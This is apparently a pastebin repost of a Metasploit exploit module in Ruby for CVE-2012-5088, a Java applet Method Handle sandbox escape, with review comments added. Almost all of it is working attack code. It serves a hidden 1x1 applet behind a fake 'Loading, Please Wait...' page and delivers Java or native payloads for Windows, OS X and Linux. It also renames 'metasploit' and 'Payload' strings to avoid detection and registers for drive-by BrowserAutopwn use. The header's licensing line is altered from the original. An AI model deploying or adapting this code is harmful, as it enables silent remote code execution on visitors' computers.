chris_defaulter007

Java Applet Method Handle Remote Code Execution

Feb 4th, 2013
  1. ##
  2. # This file is part of the Exploit + Zero Day and may be subject to
  3. # redistribution and commercial restrictions. Please see the Metasploit
  4. # web site for more information on licensing and terms of use.
  5. # http://metasploit.com/
  6. ##
  7.  
  8. require 'msf/core'
  9. require 'rex'
  10.  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  # Registered with BrowserAutopwn as not requiring JavaScript-based fingerprinting.
  autopwn_info({ :javascript => false })

  # Module metadata. Four targets are offered: a pure Java payload (the default,
  # target 0) and native x86 payloads for Windows, OS X and Linux. The payload
  # is capped at 20480 bytes and NOP generation is disabled.
  def initialize( info = {} )

    super( update_info( info,
      'Name' => 'Java Applet Method Handle Remote Code Execution',
      'Description' => %q{
This module abuses the Method Handle class from a Java Applet to run arbitrary
Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
earlier.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Unknown', # Vulnerability discovery at security-explorations.com
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2012-5088' ],
          # NOTE(review): a bare number under 'URL' looks like an OSVDB id rather
          # than a URL; confirm the intended reference type.
          [ 'URL', '86352' ],
          [ 'BID', '56057' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
        ],
      'Platform' => [ 'java', 'win', 'osx', 'linux' ],
      'Payload' => { 'Space' => 20480, 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Oct 16 2012'
    ))
  end


  # Loads the two precompiled class files shipped under
  # data/exploits/cve-2012-5088 (relative to the install root) as raw bytes,
  # then randomizes the exploit class name before delegating to super.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class")
    @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # The replacement name is random but exactly as long as "Exploit" (7 chars)
    # and is substituted directly into the raw bytecode; presumably the equal
    # length is what keeps the class file's length-prefixed entries consistent
    # — TODO confirm. @exploit_class_name is reused by on_request_uri and
    # generate_html, so every served artifact refers to the same random name.
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  # HTTP request handler (HttpServer mixin callback). Each request URI is
  # logged via print_status and then dispatched on the URI's suffix.
  #
  # @param cli     client connection, passed through to the send_* helpers
  # @param request incoming HTTP request; only request.uri is inspected
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    # NOTE(review): `$` anchors at end of line, not end of string, in Ruby;
    # `\z` would be the strict anchor (same applies to the `/\/$/` branch).
    when /\.jar$/i
      # Start from the encoded payload jar and add the two class files loaded
      # in setup: the exploit class under its randomized name, B.class under
      # its original name.
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("B.class", @loader_class)
      # Every entry name and body has the literal strings "metasploit" and
      # "Payload" replaced by random alphabetic strings of the same length
      # ("payload".length == "Payload".length). gsub! returns nil when nothing
      # matched, but its return value is not used here.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      # The jar is served with a generic binary content type.
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Trailing-slash URI: regenerate the payload for this client and serve
      # the landing page; if payload generation fails, answer 404 instead.
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      # Any other URI is redirected to the module's resource path plus '/'.
      send_redirect(cli, get_resource() + '/', '')
    end

  end

  # Builds the landing page: a minimal HTML document whose body holds a 1x1
  # <applet> element. Its archive attribute is a fresh random 8-letter .jar
  # name (any URI ending in .jar is answered by on_request_uri) and its code
  # attribute is the randomized exploit class name chosen in setup.
  #
  # @return [String] the complete HTML document
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end